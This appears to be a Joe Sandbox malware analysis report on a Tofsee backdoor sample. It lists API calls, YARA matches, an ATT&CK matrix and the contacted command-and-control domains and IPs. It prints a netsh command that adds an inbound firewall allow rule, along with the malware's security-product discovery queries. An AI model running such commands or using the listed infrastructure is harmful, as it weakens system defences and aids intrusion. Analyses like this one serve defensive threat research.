        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,0_2_0040405E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,0_2_00409326

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Uses netsh to modify the Windows network and firewall settings
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Changes security center settings (notifications, updates, antivirus, firewall)
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
        Modifies the windows firewall
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
        Source: svchost.exe, 00000014.00000002.531860154.0000027EFA7BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
        Source: svchost.exe, 00000014.00000002.531813562.0000027EFA76C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
        Source: svchost.exe, 00000015.00000002.531091256.000002142EE29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.531270706.000002142EF02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

        Stealing of Sensitive Information

        barindex
        Yara detected Tofsee
        Source: Yara matchFile source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 5128, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: qbxctmyn.exe PID: 4532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2888, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Tofsee
        Source: Yara matchFile source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 5128, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: qbxctmyn.exe PID: 4532, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2888, type: MEMORYSTR
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,0_2_004088B0
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,17_2_004088B0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_001288B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,23_2_001288B0

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        1
        Valid Accounts        		1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		3
        Disable or Modify Tools        		1
        Input Capture        		2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium1
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts41
        Native API        		1
        Valid Accounts        		1
        Valid Accounts        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop Protocol1
        Input Capture        		Exfiltration Over Bluetooth12
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts2
        Command and Scripting Interpreter        		14
        Windows Service        		1
        Access Token Manipulation        		2
        Obfuscated Files or Information        		Security Account Manager1
        File and Directory Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts3
        Service Execution        		Logon Script (Mac)14
        Windows Service        		21
        Software Packing        		NTDS25
        System Information Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer112
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon Script412
        Process Injection        		1
        DLL Side-Loading        		LSA Secrets141
        Security Software Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        File Deletion        		Cached Domain Credentials12
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items121
        Masquerading        		DCSync1
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Valid Accounts        		Proc Filesystem1
        System Owner/User Discovery        		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)12
        Virtualization/Sandbox Evasion        		/etc/passwd and /etc/shadow1
        Remote System Discovery        		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
        Access Token Manipulation        		Network Sniffing1
        System Network Configuration Discovery        		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron412
        Process Injection        		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 800802 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 51 microsoft-com.mail.protection.outlook.com 2->51 57 Snort IDS alert for network traffic 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 7 other signatures 2->63 8 qbxctmyn.exe 2->8         started        11 file.exe 2 2->11         started        14 svchost.exe 2->14         started        16 8 other processes 2->16 signatures3 process4 file5 69 Detected unpacking (changes PE section rights) 8->69 71 Detected unpacking (overwrites its own PE header) 8->71 73 Writes to foreign memory regions 8->73 83 2 other signatures 8->83 18 svchost.exe 1 8->18         started        49 C:\Users\user\AppData\Local\...\qbxctmyn.exe, PE32 11->49 dropped 75 Uses netsh to modify the Windows network and firewall settings 11->75 77 Modifies the windows firewall 11->77 22 cmd.exe 1 11->22         started        25 netsh.exe 3 11->25         started        27 cmd.exe 2 11->27         started        31 3 other processes 11->31 79 Changes security center settings (notifications, updates, antivirus, firewall) 14->79 29 MpCmdRun.exe 1 14->29         started        81 Query firmware table information (likely to detect VMs) 16->81 signatures6 process7 dnsIp8 53 svartalfheim.top 176.124.192.220, 443, 49704, 49705 GULFSTREAMUA Russian Federation 18->53 55 microsoft-com.mail.protection.outlook.com 104.47.54.36, 25, 49703 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->55 65 System process connects to network (likely due to code injection or exploit) 18->65 67 Deletes itself after installation 18->67 47 C:\Windows\SysWOW64\...\qbxctmyn.exe (copy), PE32 22->47 dropped 33 conhost.exe 22->33         started        35 conhost.exe 25->35         started        37 conhost.exe 27->37         started        39 conhost.exe 29->39         started        41 conhost.exe 31->41         started        43 conhost.exe 31->43         started        45 conhost.exe 31->45         started        file9 signatures10 process11

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        file.exe44%ReversingLabsWin32.Ransomware.Stop
        file.exe34%VirustotalBrowse
        file.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\qbxctmyn.exe100%AviraTR/Crypt.XPACK.Gen
        C:\Users\user\AppData\Local\Temp\qbxctmyn.exe100%Joe Sandbox ML

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        17.2.qbxctmyn.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
        23.2.svchost.exe.120000.0.unpack100%AviraBDS/Backdoor.GenDownload File
        17.2.qbxctmyn.exe.e90000.2.unpack100%AviraBDS/Backdoor.GenDownload File
        0.2.file.exe.2080e67.1.unpack100%AviraTR/Patched.Ren.GenDownload File
        23.3.svchost.exe.649000.1.unpack100%AviraHEUR/AGEN.1253311Download File
        23.3.svchost.exe.649000.2.unpack100%AviraHEUR/AGEN.1253311Download File
        23.3.svchost.exe.649000.4.unpack100%AviraHEUR/AGEN.1253311Download File
        23.3.svchost.exe.649000.3.unpack100%AviraHEUR/AGEN.1253311Download File
        0.2.file.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
        0.3.file.exe.21c0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
        17.2.qbxctmyn.exe.e30e67.1.unpack100%AviraTR/Patched.Ren.GenDownload File
        17.3.qbxctmyn.exe.e50000.0.unpack100%AviraTR/Patched.Ren.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        svartalfheim.top18%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://%s.xboxlive.com0%URL Reputationsafe
        jotunheim.name:4430%URL Reputationsafe
        https://dynamic.t0%URL Reputationsafe
        svartalfheim.top:4430%URL Reputationsafe
        https://%s.dnet.xboxlive.com0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        svartalfheim.top
        		176.124.192.220
        		truetrueunknown
        microsoft-com.mail.protection.outlook.com
        		104.47.54.36
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          jotunheim.name:443true
          • URL Reputation: safe
          		unknown
          svartalfheim.top:443true
          • URL Reputation: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.309037099.00000189DAC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000003.309061387.00000189DAC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309440269.00000189DAC56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.309310506.00000189DAC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309380373.00000189DAC42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://%s.xboxlive.comsvchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		low
                                      https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.309061387.00000189DAC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309440269.00000189DAC56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309380373.00000189DAC42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dynamic.tsvchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000002.309364718.00000189DAC39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://activity.windows.comsvchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.309310506.00000189DAC13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://%s.dnet.xboxlive.comsvchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		low
                                                                          https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              176.124.192.220
                                                                              		svartalfheim.topRussian Federation
                                                                              		59652GULFSTREAMUAtrue
                                                                              104.47.54.36
                                                                              		microsoft-com.mail.protection.outlook.comUnited States
                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                              General Information

                                                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                              Analysis ID:800802
                                                                              Start date and time:2023-02-07 20:03:06 +01:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 10m 12s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:26
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample file name:file.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.evad.winEXE@34/16@5/2
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HDC Information:
                                                                              • Successful, ratio: 49.5% (good quality ratio 47.1%)
                                                                              • Quality average: 86.9%
                                                                              • Quality standard deviation: 25.3%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 62
                                                                              • Number of non-executed functions: 259
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Excluded IPs from analysis (whitelisted): 20.112.52.29, 20.81.111.85, 20.84.181.62, 20.103.85.33, 20.53.203.50
                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              20:05:14API Interceptor2x Sleep call for process: svchost.exe modified
                                                                              20:05:29API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              176.124.192.220MKux1L12Hd.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              M5jKYa84lZ.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              YJxaWrcrpx.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              RssqBuHzC8.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              vBlasFEGDm.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              sRsnwIR3OT.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              hYnwQ9e9qJ.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              NnagALyUEt.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              MJterhxmLp.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              NjzgsF1ggq.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              afxHNVJH2L.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
